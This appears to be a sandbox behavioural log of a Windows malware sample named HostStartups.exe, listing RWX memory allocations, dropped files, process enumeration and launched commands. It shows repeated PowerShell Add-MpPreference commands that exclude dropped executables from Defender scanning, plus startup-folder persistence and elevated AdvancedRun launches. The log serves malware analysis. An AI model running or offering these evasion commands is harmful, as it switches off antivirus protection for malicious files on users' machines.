heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00590000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00600000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fba1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fba2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 1114112
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009f0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00ac0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00462000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0047c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00595000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0059b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00597000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00486000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0046a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0048a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00487000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0047a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0048b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0046c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff38000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff20000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0xfff20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 996
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006ad000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c0073
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

 process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c007b
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

 process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c007f
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

 process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c0083
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

 process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c0089
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

 process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c008f
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

 process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c0093
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

 process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c009b
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

 process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c009f
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

 process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c00a7
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

 process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c00af
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

 process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c00bf
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

 process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c00c3
process_handle: 0xffffffff
3221225541 0

NtProtectVirtualMemory

 process_identifier: 996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009c00c7
process_handle: 0xffffffff
3221225541 0
file C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\AdvancedRun.exe
file C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\AdvancedRun.exe
file C:\Users\test22\AppData\Roaming\Install\Host.exe
file C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat
file C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe
file C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\test.bat
file C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\test.bat
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
cmdline powershell Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
cmdline powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
cmdline powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
cmdline powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
cmdline cmd.exe /c timeout 1
cmdline "C:\Windows\System32\cmd.exe" /c timeout 1
file C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe
file C:\Users\test22\AppData\Roaming\Install\Host.exe
file C:\Users\test22\AppData\Roaming\Install\Host.exe
file C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe
parameters: /EXEFilename "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
filepath: C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\HostStartups.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd.exe
parameters: /c timeout 1
filepath: cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\AdvancedRun.exe
parameters: /EXEFilename "C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
filepath: C:\Users\test22\AppData\Local\Temp\16284a5e-7b2c-4388-953c-0be42718caec\AdvancedRun.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd.exe
parameters: /c timeout 1
filepath: cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\AdvancedRun.exe
parameters: /EXEFilename "C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
filepath: C:\Users\test22\AppData\Local\Temp\ff3711a4-2337-4e95-9909-244dfe69509b\AdvancedRun.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Install\Host.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
filepath: powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd.exe
parameters: /c timeout 1
filepath: cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

Process32FirstW

 snapshot_handle: 0x00000108
process_name: [System Process]
process_identifier: 0
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: System
process_identifier: 4
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: smss.exe
process_identifier: 224
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: csrss.exe
process_identifier: 300
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: wininit.exe
process_identifier: 348
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: csrss.exe
process_identifier: 364
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: winlogon.exe
process_identifier: 396
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: services.exe
process_identifier: 440
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: lsass.exe
process_identifier: 456
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: lsm.exe
process_identifier: 464
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: svchost.exe
process_identifier: 568
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: svchost.exe
process_identifier: 640
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: svchost.exe
process_identifier: 700
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: svchost.exe
process_identifier: 776
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: svchost.exe
process_identifier: 824
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: svchost.exe
process_identifier: 968
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: svchost.exe
process_identifier: 264
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: spoolsv.exe
process_identifier: 820
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: svchost.exe
process_identifier: 292
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: svchost.exe
process_identifier: 1192
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: srvany.exe
process_identifier: 1244
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: taskhost.exe
process_identifier: 1284
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: KMService.exe
process_identifier: 1324
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: conhost.exe
process_identifier: 1376
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: sppsvc.exe
process_identifier: 1800
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: svchost.exe
process_identifier: 1876
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: dwm.exe
process_identifier: 1496
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: explorer.exe
process_identifier: 1848
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: SearchIndexer.exe
process_identifier: 2548
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: thunderbird.exe
process_identifier: 3960
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: pw.exe
process_identifier: 5008
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: audiodg.exe
process_identifier: 7936
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: splwow64.exe
process_identifier: 3928
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: SearchProtocolHost.exe
process_identifier: 3816
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: SearchFilterHost.exe
process_identifier: 7776
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: mobsync.exe
process_identifier: 6504
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: pw.exe
process_identifier: 6252
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: taskhost.exe
process_identifier: 1480
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: cmd.exe
process_identifier: 2504
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: conhost.exe
process_identifier: 3972
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: pw.exe
process_identifier: 7180
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: HostStartups.exe
process_identifier: 996
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: slui.exe
process_identifier: 4748
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: AdvancedRun.exe
process_identifier: 7232
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: TrustedInstaller.exe
process_identifier: 8088
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe
process_identifier: 3632
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: cmd.exe
process_identifier: 3024
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: conhost.exe
process_identifier: 7740
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: pw.exe
process_identifier: 8960
1 1 0

Process32NextW

 snapshot_handle: 0x00000108
process_name: HostStartups.exe
process_identifier: 2576
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2576
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x10001000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\AppData\Local\ᎤᎢ᎚፹ᎲᎋᎭ᎚ᎧᎧ᎐፳ᎫᎈᎥ፴ᎄ፶ᎣᎦᎂ፴፺ᎮᎱ\HostStartups.exe_Url_rjpsa4eyicg2gx1w41qerrkloc2ldhpk\1.540.99.534\user.config
flags: 1
oldfilepath_r: C:\Users\test22\AppData\Local\ᎤᎢ᎚፹ᎲᎋᎭ᎚ᎧᎧ᎐፳ᎫᎈᎥ፴ᎄ፶ᎣᎦᎂ፴፺ᎮᎱ\HostStartups.exe_Url_rjpsa4eyicg2gx1w41qerrkloc2ldhpk\1.540.99.534\kxpiaqp2.newcfg
newfilepath: C:\Users\test22\AppData\Local\ᎤᎢ᎚፹ᎲᎋᎭ᎚ᎧᎧ᎐፳ᎫᎈᎥ፴ᎄ፶ᎣᎦᎂ፴፺ᎮᎱ\HostStartups.exe_Url_rjpsa4eyicg2gx1w41qerrkloc2ldhpk\1.540.99.534\user.config
oldfilepath: C:\Users\test22\AppData\Local\ᎤᎢ᎚፹ᎲᎋᎭ᎚ᎧᎧ᎐፳ᎫᎈᎥ፴ᎄ፶ᎣᎦᎂ፴፺ᎮᎱ\HostStartups.exe_Url_rjpsa4eyicg2gx1w41qerrkloc2ldhpk\1.540.99.534\kxpiaqp2.newcfg
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\AppData\Local\ᎤᎢ᎚፹ᎲᎋᎭ᎚ᎧᎧ᎐፳ᎫᎈᎥ፴ᎄ፶ᎣᎦᎂ፴፺ᎮᎱ\HostStartups.exe_Url_rjpsa4eyicg2gx1w41qerrkloc2ldhpk\1.540.99.534\user.config
flags: 1
